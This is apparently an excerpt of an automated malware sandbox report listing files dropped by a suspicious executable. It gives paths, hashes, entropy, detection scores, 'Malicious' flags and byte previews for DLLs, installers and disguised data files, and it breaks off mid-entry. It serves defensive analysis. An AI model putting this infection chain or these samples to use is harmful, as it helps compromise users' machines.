                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):608080
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):450024
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2046288
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):257872
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):80880
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):8538160
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.894832692431241
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:196608:PYATHrqMo097ughAPM6R5b9dXXvRRHmRqB7:PzLqMo09aghAk6Lnfm4B7
                                                                                                                                                                                                                                                                                      MD5:54D53F5BDB925B3ED005A84B5492447F
                                                                                                                                                                                                                                                                                      SHA1:E3F63366D0CC19D48A727ABF1954B5FC4E69035A
                                                                                                                                                                                                                                                                                      SHA-256:4D97E95F172CF1821EC078A6A66D78369B45876ABE5E89961E39C5C4E5568D68
                                                                                                                                                                                                                                                                                      SHA-512:F6A5B88E02E8F4CB45F8AAE16A6297D6F0F355A5E5EAF2CBBE7C313009E8778D1A36631122C6D2BCFEA4833C2F22DFD488142B6391B9266C32D3205575A8FF72
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...A..c.....................(t...................@.................................)....@......@..............................(4...0....r.............0P......x6...................................................................................text............................... ..`.itext..T........................... ..`.data...,'.......(..................@....bss.... S... ...........................idata..(4.......6..................@....didata.............................@....tls....<............2...................rdata...............2..............@..@.reloc..h6.......8...4..............@..B.rsrc.....r..0....r..l..............@..@.............@.......z..............@..@........................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1640960
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.484662993855079
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
                                                                                                                                                                                                                                                                                      MD5:D1BA9412E78BFC98074C5D724A1A87D6
                                                                                                                                                                                                                                                                                      SHA1:0572F98D78FB0B366B5A086C2A74CC68B771D368
                                                                                                                                                                                                                                                                                      SHA-256:CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
                                                                                                                                                                                                                                                                                      SHA-512:8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2469936
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.434916453080517
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
                                                                                                                                                                                                                                                                                      MD5:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                                                                      SHA1:FE54B31B0DB8665AA5B22BED147E8295AFC88A03
                                                                                                                                                                                                                                                                                      SHA-256:A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
                                                                                                                                                                                                                                                                                      SHA-512:140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\driverRemote_debug\groupware.wav

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20891
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.41735141652497
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:lhFF7DUQMnBNgCxPE/7tDEZAXMtV3STIxyd3A3lafgfdl6ii04ZQoUXXhnF6b2xD:fBMYqPE/7tDEZAK3STIxnlrn6U4ZhUXp
                                                                                                                                                                                                                                                                                      MD5:FCE67E49E191BC3FD22997050C92BA01
                                                                                                                                                                                                                                                                                      SHA1:34C08D6D404A94C2447B671A49731364EA0B47FF
                                                                                                                                                                                                                                                                                      SHA-256:F8EB44951269696615DFA62E8221C73D8EBCE0A820211956D5BF6C0A70C6DACF
                                                                                                                                                                                                                                                                                      SHA-512:4C4E1F908824DAA7F3081773CA22138C756601C6C6113E0DCF9CBC958E90A5028D9BE7E5404F19432D70B1E90D46919274188718D29F9A46B97E7ACBE8222991
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.j.yvH.w....F.....m....^.OL`......c.`..Ldqsp.N.....v...\ae].yH.E.`^..d...m.W.U....L......]q..]hbT.Y.TLNcOP`.r.C.Lv.A...V^Fg.dr.i.^..o.GXp.H......yu...xEIAb.LGn_Y.........gjE[...hkhU..A..Adq.QlsO...`Rt..J]..s..u.j.......[lcxNuN.ZoANK..yth]q..t..DL.A`..Q.`_P...x.\..`..I.G.b.Iml.....MVfq.r[sE.HV..a.h.W.d.[QF.N...P.uaFNBdFj.s.W...x...Y...ZJ..x.u.iCyeyv.QxL.O..j.ckOGE^..xSv...^W].S.k\.en.VIuYfSuS...qu...f....K..]f...._.O.O.o.d...m.OArv...Lq....menEX..d..Qf..\FiRd.L.Vu.t.BJ...u.RR.JekI.PDg..g.H....\k..F..LX.a_.m..Bj.brCBh...v.a....ch.D[...G.....D....j.NaelL.F.^a.a.ur.^.tsN..ZH.Io.N.tr.f.exr.D.SNbHIR....]Jb.D.nlu..B.LnY..jp.n...bpmqb...Kc..y.ut.N._m.G.r.c..y.m..]cF.V.F...sMC.yrv..i....O..IAvn.vn..B.A.w.BDF...]M....b.G.XlB.xar..g.q...N..AU.E.Ox....R..k...vaP...S..sQ.....R[O..I.I.dma.T..S.E.y.a.FG...wOk..Q..\U.]..`..x\Z...ps.J..F.....Qf...Z.Pi.L..P.b.\.Tm.P.R.B.PU..d...k..[iS^.TH^N.hjrwwg._....wL....[.I.rt..g.]x..qh[Y.H.xn.N...A..wRF..W.V....jyU.Du.o...p..vO.m.lOTjk.HW.......L.dO....C..bQ.L..i.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\driverRemote_debug\macrospore.indd

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1385173
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.824453259021933
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24576:3ThHnVpIact6qMIPrpLhmwg9lUKOxrcP4912kZp/GYOQWINQvshJC6lVwymgw:DhHVfC6q7PrpLhmwDKOxrg4r2kEINQvX
                                                                                                                                                                                                                                                                                      MD5:31885BEFE89EAE873D959F47BB548157
                                                                                                                                                                                                                                                                                      SHA1:4A1D665C491D334EAE72CDD5B784F2A064A8FBBF
                                                                                                                                                                                                                                                                                      SHA-256:A06A3D6810B4B5F73A0B71487F9B32538C34F66E26F0DC1632F3D40BF0E11B71
                                                                                                                                                                                                                                                                                      SHA-512:0C1561929D19E52229E8FE3295148C8E4BC73526A59028F9FBB5BD11D2A8163CC6137232B55082AA1FC1E5F444F583064F4BC7BF282730B754BEE3C9656ED5D0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:..ZJpL.......C\.bFNR.cgl\..j.......\u...KRCMZ....KY^.L..ap...BbB..J\.qH..o.e....]OZuwL..Nnvv..f.F.fV.T......n..Q....yhai....P.......l........O.sO.dX.RdX...L.i.q..UNub..IJ..C....FH.uq.xn..^Cfs..pb....RUlHfEr`..U....^wcX..Se.uYkc..kb.Z[O..K.F.u.i..pibZ]_O.`....\UJpL.eJ`..ro.xE.mJ]O.R...D.Cft...J..feJ...IuHV.fpvV.xnW.XaN..A..Z.JupSsC..u.N.Gm..j.L..[R.....Yv]U..hrwy.jV...oSK...ffiH..H.RK.gmJw.i.uK..rN.Ei.\PHj...gE...C..dC...u...N._.fYV.e.d.a..M.T....sd.k.....S.w.....R`k......Sd.Kg.i.\.m..p.w.s...]Gx..e^....Q...PBs.\W.e.Xv.....D.a[K].[V.Ku.^Q.s...Gu.d.LO.l.YN...k....QD.\..JN.tUG...OeM.KR..uK.t..V.RB.\.h.h....d.HA.t.i...[.an...y.....``^EiEXul.gUG..uH..Z.nGU....H..O.D...s.P.kmoSk.[ZVvO..X..ae..LqtTN..K.PDn...........]rZOy.V.Mq.bgP....xM..VD__....iup[.\Ma....ty.PKFid..g..nThl..w...ub......o.j.R.e....iuLb.p..wA.].d.f....Ub...mV.Xvv.U.f.E..A..Zv.ZP.d......LVi_...O..nwI\N.F...d..y..j..^C.Hu.Am[Jw.S]ul..d.m[..UQT.Hl..QDC.uZ..Ds.Z..W.X.w..^....ryJi`lj...O...xJ..jNVU.se.c.I.D.....O....P\GW`...Zn.E.x

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1596416
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.466475314379774
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:h2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTMq+PDXx1lWz0pd:tmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
                                                                                                                                                                                                                                                                                      MD5:EA945E6BC518D0B25AAC0FCE13AE6E16
                                                                                                                                                                                                                                                                                      SHA1:4144AC69F72190F1AD163A7CC7BD38E18109122C
                                                                                                                                                                                                                                                                                      SHA-256:6D9D8727E9D8C00EB74B27C6EE3FDC90D538F30CF6A07C4B939A03FC70CE59EE
                                                                                                                                                                                                                                                                                      SHA-512:4E2F4CF61FC6364DDACA6B0BF6D917F8E136526DC1323A8BAA48166CB291285491CC2D083B65EBE30F3DC27F62B2E154A834C721140E6004596D655269239A95
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..|....p...............................}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\e7b0f02f

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 3680 x 2256, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):7175750
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.997145606333841
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:98304:vH6iII1nFLrq9NF65iY3YZ019+s71up2h92Xf41tiE6Lldqib9dKuhSyVF8ZYGXO:/THrqMo097ughAPM6R5b9dXXvRRHmRqj
                                                                                                                                                                                                                                                                                      MD5:15FE0C4C282DF938F0AE415334FC8D11
                                                                                                                                                                                                                                                                                      SHA1:0B97FA302ED3F3C2B5DBB2DC8F0386E578EBC14D
                                                                                                                                                                                                                                                                                      SHA-256:EE44025DB5AD03B33944BF734F6F256D8B996E89F2EC22197C1767FBAE70853D
                                                                                                                                                                                                                                                                                      SHA-512:FAE66F89BC0007D59570A87EF815295A9499299086BBD2418DD17176C814A9FFC4559FC99B9FA2A1EC14E9D18B4206CE406CC483F04691F3A644CB6A84F932B5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...`............{.. .IDATx..w\.......ET...kF...Ix...i...*ZVv...+%#eU....v.......:.\.....~..<.t...\.}.|.c.....................................................................@.,...............................W.................................._.$................................... ................................U@.,...............................W.................................._.$....................OLwM.#3q...Lk.<w......u@..J/..gQV..k...+.GyO..P".U@e.ep.g...>.L.../8..E...&Sv7a..'.........(WHLA....:7..\....9....}p=)....t..kUhW...".c.c.E..}).o..._X.......e3c.(.0........V.._.2...7..5.^-.i..8y..v.C..r..o.?~.f.HU...........8....3...?.........Y...&|.:.ZE..).;]..R.Z...KLxzT{.D.&.....I-.e.EM~Z.s.......W]at.sr~.[.Lyv..V:....s..U..bc...mQ[..-......E'-.......=."..e........g.Y.T.....v..q..N..;[....$..t........[P).....&..~g.gj...R...r..y......$.V=.*+......,.V. ..~.j.....`.....S...4._..%1..U...n...I....}.eb6.W.........d........i.}g..F9,[.*.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\eb11c30d

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1513199
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.757430346250855
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24576:Tvd4C+K336Ixx9jAF8BfdI7X5gEII/RHQRZz2oXKEP4LbBVdlZElV7:r6eqIx/g8xeaEHlQRd2kYbBVNElV7
                                                                                                                                                                                                                                                                                      MD5:428379D22B616277BE1C270B126D4FF6
                                                                                                                                                                                                                                                                                      SHA1:CDD8AA3D75B9136CFBB83EFEA76057229A239382
                                                                                                                                                                                                                                                                                      SHA-256:F4B0FC43AB9D9CC1575E9882167E6F6867D618008F1A00683F2B7E7CD303FDC3
                                                                                                                                                                                                                                                                                      SHA-512:8EB3B3C6962DF67D4F1075B7DD7087DE443832B612F480B10F82DA656C0BDE04956FF1FDE3BFF39244805CA61F97D5C78865F72EF2D6B38670AE1F2F9166A4E1
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:X...Z...[...[...Z.......O...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...~.......~..8.4...4......./...5...).:...../...[...[...[...[...[...[...[...[...[...[...[.....2...7.....[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[.....>...:.[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...~........).=.....).,.[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...-...u...i...[...[...[...[...[...[...[...[...[...[...

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\f82d66fe

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1513199
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.757430667369156
                                                                                                                                                                                                                                                                                      Encrypted:false
